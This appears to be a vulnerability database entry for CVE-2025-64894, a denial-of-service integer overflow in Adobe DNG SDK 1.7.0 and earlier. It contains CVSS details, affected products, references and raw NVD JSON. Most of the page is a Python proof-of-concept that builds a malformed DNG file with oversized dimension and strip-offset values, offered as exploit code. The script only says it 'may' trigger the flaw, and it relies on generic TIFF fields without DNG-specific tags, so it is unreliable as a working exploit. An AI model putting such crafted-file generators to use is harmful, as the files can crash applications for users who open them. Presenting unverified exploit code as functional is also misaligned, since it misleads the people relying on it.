CVE-2025-64894

Description

DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could lead to application denial-of-service. An attacker could exploit this issue to cause the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dng_software_development_kit:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe DNG SDK <= 1.7.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-64894 PoC - Adobe DNG SDK Integer Overflow
This PoC generates a minimal malicious DNG file to trigger integer overflow.
WARNING: For educational and security research purposes only.
"""

import struct
import os

def create_malicious_dng(output_path):
    """
    Create a minimal DNG file that may trigger integer overflow in DNG SDK.
    The vulnerability exists in how DNG SDK handles certain IFD entries
    with specially crafted values that cause integer overflow during size calculations.
    """
    
    # TIFF header
    tiff_header = bytearray([
        0x49, 0x49, 0x2A, 0x00,  # Byte order: little-endian
        0x08, 0x00, 0x00, 0x00   # Offset to first IFD
    ])
    
    # IFD0 structure
    # Number of directory entries
    num_entries = 6
    ifd_entries = bytearray()
    
    # Entry 1: NewSubFileType (Tag 254) - LONG type
    # Value that could trigger overflow when combined with other calculations
    ifd_entries += struct.pack('<HHII', 254, 4, 1, 0)
    
    # Entry 2: ImageWidth (Tag 256) - SHORT type
    # Large dimension value
    ifd_entries += struct.pack('<HHII', 256, 3, 1, 0xFFFF)
    
    # Entry 3: ImageLength (Tag 257) - SHORT type
    # Large dimension value that may cause overflow in row stride calculations
    ifd_entries += struct.pack('<HHII', 257, 3, 1, 0xFFFF)
    
    # Entry 4: BitsPerSample (Tag 258) - SHORT type
    ifd_entries += struct.pack('<HHII', 258, 3, 3, 0)
    
    # Entry 5: Compression (Tag 259) - SHORT type
    ifd_entries += struct.pack('<HHII', 259, 3, 1, 1)
    
    # Entry 6: StripOffsets (Tag 273) - LONG type
    # This entry with specially crafted count could trigger integer overflow
    # when SDK calculates total data size
    large_offset = 0x7FFFFFFF  # Near INT32_MAX - potential overflow trigger
    ifd_entries += struct.pack('<HHII', 273, 4, 1, large_offset)
    
    # Next IFD offset (0 means no more IFDs)
    next_ifd = struct.pack('<I', 0)
    
    # Combine all parts
    malicious_dng = tiff_header + struct.pack('<H', num_entries) + ifd_entries + next_ifd
    
    # Add some padding data to simulate image data
    padding = b'\x00' * 1024
    malicious_dng += padding
    
    with open(output_path, 'wb') as f:
        f.write(malicious_dng)
    
    print(f"[+] Malicious DNG file created: {output_path}")
    print(f"[+] File size: {len(malicious_dng)} bytes")
    print(f"[!] This PoC attempts to trigger CVE-2025-64894")
    print(f"[!] The vulnerability is an integer overflow in DNG SDK's size calculations")

if __name__ == "__main__":
    output_file = "CVE-2025-64894_poc.dng"
    create_malicious_dng(output_file)
    print("\n[*] Note: Actual exploitation requires specific conditions")
    print("[*] and may vary based on DNG SDK version and compilation options")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64894
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64894
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64894/
[4] VulDB https://vuldb.com/cve/CVE-2025-64894
[5] https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64894", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:16:07.983", "lastModified": "2025-12-10T16:03:12.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could lead to application denial-of-service. An attacker could exploit this issue to cause the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dng_software_development_kit:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.0", "matchCriteriaId": "8A37E544-82AE-4E72-BA5D-A8C98061CEF8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}